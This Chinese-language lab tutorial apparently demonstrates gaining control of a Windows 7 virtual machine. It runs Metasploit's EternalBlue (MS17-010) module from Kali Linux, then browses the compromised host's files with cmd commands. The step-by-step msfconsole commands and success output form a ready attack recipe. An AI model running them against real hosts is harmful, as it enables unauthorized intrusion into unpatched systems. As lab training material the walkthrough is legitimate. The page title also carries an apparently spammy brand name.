一、背景介绍 Metasploit就是一个网络安全框架。它的全称叫做The Metasploit Framework,简称叫做MSF。Metasploit作为全球最受欢迎的工具,不仅仅是因为它的方便性和强大性,更重要的是它的框架。它允许使用者开发自己的脚本,从而进行测试。Metasploit(msf)究竟威力如何呢?如何利用木码控制受害者主机呢?接下来让我们一起学习! 二、资源装备 1.安装好 Win7的虚拟机一台 2.整装待发的小白一个。 3.安装好的Kali Linux虚拟机一台。 三、安全演练 3.1 利用Metasploit(msf)框架对目标主机进行测试,如下图所示。 步骤1:启动Metasploit(msf)框架,如下图所示。 命令:msfconsole 步骤2:Metasploit(msf)框架启动成功,如下图所示。 步骤3:检索编号,如下图所示。 命令:search 编号 例子:search ms17-010 步骤4:检索到有关的利用模块如下图所示。 步骤5:选择对应的利用模块并使用,如下图所示。 命令:use 利用模块名称 例子:use exploit/windows/smb/ms17_010_eternalblue 步骤6:查看使用的模块需要设置的参数,如下图所示。。 命令:show option 步骤7:设置参数,如下图所示。 命令:set rhosts 受害者主机IP 例子:set rhosts 192.168.78.160 步骤8:查看对应的参数是否设置成功,如下图所示。 命令:show options 步骤9:运行利用模块,如下图所示。 命令:run 步骤10:如下图所示,成功拿下目标主机 提示:ETERNALBLUE overwrite completed successfully! 3.2 利用DOS命令控制目标主机,如下图所示。 步骤1:进入Windows系统的cmd窗口,如下图所示。 步骤2:利用命令查看受害者主机的文件夹信息,如下图所示。 命令:dir 切换文件夹目录:cd 文件夹名 切换盘符:cd 盘符名 点我学习专业的Kali Linux安全技术
用户必须遵守《计算机软件保护条例(2013修订)》第十七条:为了学习和研究软件内含的设计思想和原理,通过安装、显示、传输或者存储软件等方式使用软件的,可以不经软件著作权人许可,不向其支付报酬。鉴于此条例,用户从本平台下载的全部源码(软件)教程仅限学习研究,未经版权归属者授权不得商用,若因商用引起的版权纠纷,一切责任均由使用者自行承担,本平台所属公司及其雇员不承担任何法律责任。
尚美源码教程库 » 网络安全与w88优德中文版安全及计算机安全:如何使用Kali Linux获取Windows计算机操作系统管理员权限【实战】